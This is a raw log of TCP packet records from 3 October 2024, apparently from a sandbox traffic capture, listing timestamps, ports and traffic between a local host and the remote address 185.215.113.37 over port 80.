Oct 3, 2024 18:38:23.939282894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939297915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939322948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939338923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939357042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939404964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939409018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939446926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939455986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939480066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939491034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939513922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939524889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939558029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939599991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939631939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939646959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939665079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.939675093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.939708948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951020002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951075077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951078892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951107979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951121092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951152086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951159954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951191902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951225042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951226950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951239109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951260090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951272011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951297998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951306105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951349020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951400995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951407909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951450109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951468945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951493979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951517105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951551914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:23.951566935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:23.951596022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.067641020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.074577093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.291719913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.291766882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.291801929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.291807890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.291835070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.291850090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.291850090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.291878939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.291888952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.291924000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.291958094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.291975021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292007923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292009115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292043924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292056084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292077065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292089939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292112112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292124987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292150021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292172909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292207003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292223930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292256117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292272091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292299986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292304993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292340040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292346954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292375088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292375088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292409897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292418957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292442083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292458057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292475939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292488098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292510986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292524099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292546034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292557001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292579889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292586088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292618990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292619944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292649031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292681932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292697906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292716980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292732954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292749882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292762041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292785883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292795897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292819977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292831898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292854071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292860985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292887926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292900085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292922974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292928934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292954922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292968988 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.292992115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.292999983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.293028116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.293037891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.293148041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.293181896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.293199062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.293215990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.293227911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.293263912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.293291092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.293329000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.293338060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.293361902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.293376923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.293397903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.293406963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.293428898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.293443918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.293476105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.587604046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.587673903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.587678909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.587711096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.587726116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.587765932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.587781906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.587800026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.587815046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.587832928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.587847948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.587867022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.587882042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.587903023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.587915897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.587953091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588000059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588033915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588067055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588085890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588099003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588125944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588133097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588152885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588172913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588332891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588366985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588387012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588399887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588432074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588433981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588447094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588465929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588479996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588514090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588519096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588548899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588581085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588598967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588613033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588629007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588648081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588665009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588686943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588699102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588736057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.588911057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588959932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.588994026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589011908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589026928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589040995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589060068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589081049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589093924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589118958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589128017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589131117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589160919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589175940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589195013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589210033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589227915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589246035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589262009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589294910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589312077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589329004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589344025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589361906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589375973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589396954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589416027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589430094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589448929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589463949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589479923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589497089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589513063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589529991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589544058 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589581013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.589894056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589927912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.589953899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590013027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590048075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590063095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590079069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590094090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590111971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590126991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590147018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590162992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590179920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590199947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590212107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590231895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590245962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590279102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590296984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590312004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590329885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590344906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590362072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590379000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590394974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590411901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590426922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590445042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590460062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590477943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590495110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590511084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590528011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590544939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590560913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590579033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590595007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590626955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590825081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590857983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590892076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590908051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590924978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590941906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590959072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.590972900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.590992928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591012001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591027021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591038942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591059923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591073990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591094971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591108084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591128111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591144085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591161966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591176033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591196060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591209888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591231108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591247082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591264009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591278076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591298103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591314077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591331005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591350079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591371059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591412067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591419935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591422081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591475964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591489077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591517925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591542959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591567993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591788054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591820955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591840029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591849089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591867924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591881990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591898918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591917992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591929913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591950893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591964960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.591984034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.591995001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592016935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592030048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592050076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592061996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592083931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592098951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592117071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592133999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592153072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592168093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592185974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592201948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592219114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592233896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592251062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592261076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592279911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592314005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592330933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592346907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592361927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592381001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592391968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592415094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592431068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592447996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592498064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:24.592736006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:24.592771053 CEST	80	49730	185.215.113.37	192.168.2.4
